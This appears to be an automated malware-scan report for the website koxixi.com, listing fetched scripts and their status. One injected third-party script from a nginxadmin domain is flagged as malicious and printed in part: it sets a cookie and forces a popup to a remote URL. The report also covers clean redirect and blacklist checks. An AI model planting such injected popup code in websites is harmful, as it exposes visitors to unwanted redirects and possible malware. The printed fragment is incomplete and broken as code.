Scanned pages/files
Request | Server response | Status |
http://www.koxixi.com/ | 200 OK Content-Length: 67035 Content-Type: text/html | clean |
http://www.koxixi.com/data/config.js | 200 OK Content-Length: 100 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/jquery.min.js | 200 OK Content-Length: 30775 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/css.js | 200 OK Content-Length: 1728 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/common.js | 200 OK Content-Length: 10288 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/login.js | 200 OK Content-Length: 1011 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/validator.js | 200 OK Content-Length: 10398 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/mall/js/base64.js | 200 OK Content-Length: 78175 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/mall/js/function.js | 200 OK Content-Length: 574 Content-Type: application/x-javascript | clean |
http://free.nginxadmin.net/free.js?v=20130821 | 200 OK Content-Length: 8247 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var oV1=window;
function fStart(u,n,v){
  if (!oV1.opera) var twin=oV1.open(u,n,v);
  if (!window.fV1) fV13();
  var w=oV2(u,n,v);
  var wo=vWA[w];
  wo.pw=twin;
  fV3("fV10(" + w + ")",100);
  return (wo.pw&&fV35)?wo.pw:wo;
}
function fV11(){ return fV6(vV1); }
function fV5(x){ return true; }
function oV2(u,n,v){
  var c = vWA.length;
  vWA[c] = new Array;
}
}
function nginxadmin_init( popurl, expire ){
  if( nginxadmin_getcookie('nginxadmincookie') ) return;
  nginxadmin_setcookie( 'nginxadmincookie', "1", expire );
  nginxadmin_poppage( popurl );
}
var nginxadmin_expire = 3600000*24;
var nginxadmin_popurl="http://free.nginxadmin.net/host.php?refer=free";
nginxadmin_init( nginxadmin_popurl, nginxadmin_expire );
Antivirus reports:
http://www.koxixi.com/data/js.php?id=1 | 200 OK Content-Length: 362 Content-Type: text/html | clean |
http://www.koxixi.com/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 17 Jun 2014 23:29:29 GMT Location: http://vip6.nginxadmin.com/404.html Content-Type: text/html X-Cache: miss X-Server: nanning01-cdn16.fhl | clean |
http://vip6.nginxadmin.com/404.html | HTTP/1.1 200 OK Connection: close Date: Tue, 17 Jun 2014 23:29:33 GMT Accept-Ranges: bytes Server: nginx/1.4.1 Content-Type: text/html | clean |
http://www.nginxadmin.net/?refer=vip6&type=404 | 502 Bad Gateway Content-Length: 574 Content-Type: text/html | clean |
http://www.nginxadmin.net/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: koxixi.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: koxixi.com
Referer: http://www.google.com/search?q=koxixi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=koxixi.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://koxixi.com/
Result: koxixi.com is not infected or malware details are not published yet.